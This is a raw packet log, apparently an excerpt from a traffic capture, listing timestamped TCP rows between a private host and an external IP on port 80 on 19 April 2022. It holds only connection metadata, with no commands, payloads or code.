Apr 19, 2022 16:44:40.724311113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.724447966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.724508047 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.724574089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.724714041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.724778891 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.724787951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.724893093 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.724973917 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.725012064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.725121975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.725207090 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.725259066 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.725300074 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.725357056 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.725491047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.725600958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.725657940 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.725743055 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.725785017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.725852966 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.725924969 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.726002932 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.726059914 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.726227999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.726274967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.726330042 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.726495028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.726536989 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.726592064 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.726720095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.726829052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.726887941 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.726991892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.727127075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.727185011 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.727202892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.727247953 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.727308035 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.727349043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.727430105 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.727493048 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.727520943 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.727663994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.727724075 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.727763891 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.727844954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.727901936 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.727966070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.728115082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.728177071 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.728188992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.728271008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.728331089 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.728424072 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.728508949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.728569984 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.728642941 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.728785038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.728827000 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.728843927 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.728944063 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.729002953 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.729074001 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.729208946 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.729274988 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.729327917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.729440928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.729504108 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.729547977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.729681969 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.729746103 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.729825020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.729863882 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.729919910 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.729989052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.730070114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.730130911 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.730220079 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.730304003 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.730370045 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.730477095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.730609894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.730668068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.730670929 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.730834961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.730878115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.730901003 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.731038094 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.731077909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.731107950 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.731221914 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.731282949 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.731352091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.731511116 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.731576920 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.731601000 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.731692076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.731754065 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.731796980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.731933117 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.731997013 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.732044935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.732161999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.732224941 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.732291937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.732363939 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.732426882 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.732481003 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.732589006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.732651949 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.732717991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.732788086 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.732845068 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.732914925 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.733079910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.733123064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.733140945 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.733234882 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.733294010 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.733390093 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.733515978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.733578920 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.733580112 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.733761072 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.733800888 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.733844995 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.733951092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.734011889 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.734067917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.734136105 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.734196901 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.734287024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.734412909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.734471083 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.734494925 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.734615088 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.734674931 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.734693050 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.734818935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.734878063 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.734930992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.735105038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.735162973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.735165119 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.735310078 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.735383034 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.735424042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.735516071 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.735584021 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.735636950 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.735729933 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.735794067 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.735835075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.735985041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.736043930 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.736067057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.736177921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.736238956 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.736345053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.736498117 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.736557961 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.736610889 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.736713886 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.736742973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.736783028 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.736886024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.736952066 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.737018108 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.737107038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.737171888 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.737212896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.737350941 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.737415075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.737422943 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.737585068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.737639904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.737653971 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.737782955 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.737848043 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.737886906 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.738023996 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.738097906 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.738114119 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.738279104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.738353968 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.738384962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.738466978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.738533974 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.738574028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.738744974 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.738765955 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.738823891 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.738902092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.738965988 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.739067078 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.739136934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.739200115 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.739253044 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.739345074 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.739411116 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.739450932 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.739624023 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.739695072 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.739711046 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.739866972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.739933968 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.739936113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.740056992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.740134001 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.740143061 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.740266085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.740339994 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.740425110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.740514994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.740587950 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.740619898 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.740722895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.740791082 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.740854979 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.740940094 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.741008043 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.741046906 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.741183996 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.741255999 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.741271973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.741426945 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.741503000 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.741508007 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.741626024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.741693020 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.741776943 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.741858959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.741925001 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.742021084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.742103100 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.742170095 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.742238045 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.742306948 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.742376089 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.742414951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.742543936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.742608070 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.742647886 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.742744923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.742809057 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.742851973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.742985010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.743046999 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.743086100 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.743218899 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.743279934 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.743319988 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.743423939 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.743489027 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.743586063 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.743787050 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.743807077 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.743861914 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.743904114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.743971109 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.743988991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.744128942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.744219065 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.744235992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.744414091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.744472980 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.744493961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.744590044 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.744642019 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.744700909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.744863987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.744926929 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.744934082 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.745021105 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.745071888 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.745215893 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.745260954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.745318890 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.745374918 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.745537043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.745582104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.745596886 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.745701075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.745754957 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.745821953 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.745984077 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.746038914 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.746063948 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.746189117 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.746249914 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.746274948 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.746411085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.746463060 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.746495008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.746618032 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.746671915 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.746706963 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.746829033 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.746882915 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.746982098 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.747066021 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.747122049 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.747168064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.747298002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.747354031 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.747420073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.747500896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.747554064 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.747608900 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.747739077 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.747792006 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.747860909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.747977972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.748030901 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.818785906 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:40.820965052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.821017027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:40.821074963 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.018255949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.018285990 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.018400908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.018414021 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.018503904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.018569946 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.018652916 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.018732071 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.018785954 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.018809080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.018975019 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.019025087 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:41.019047022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:41.019153118 CEST	80	49758	45.135.48.153	192.168.2.4
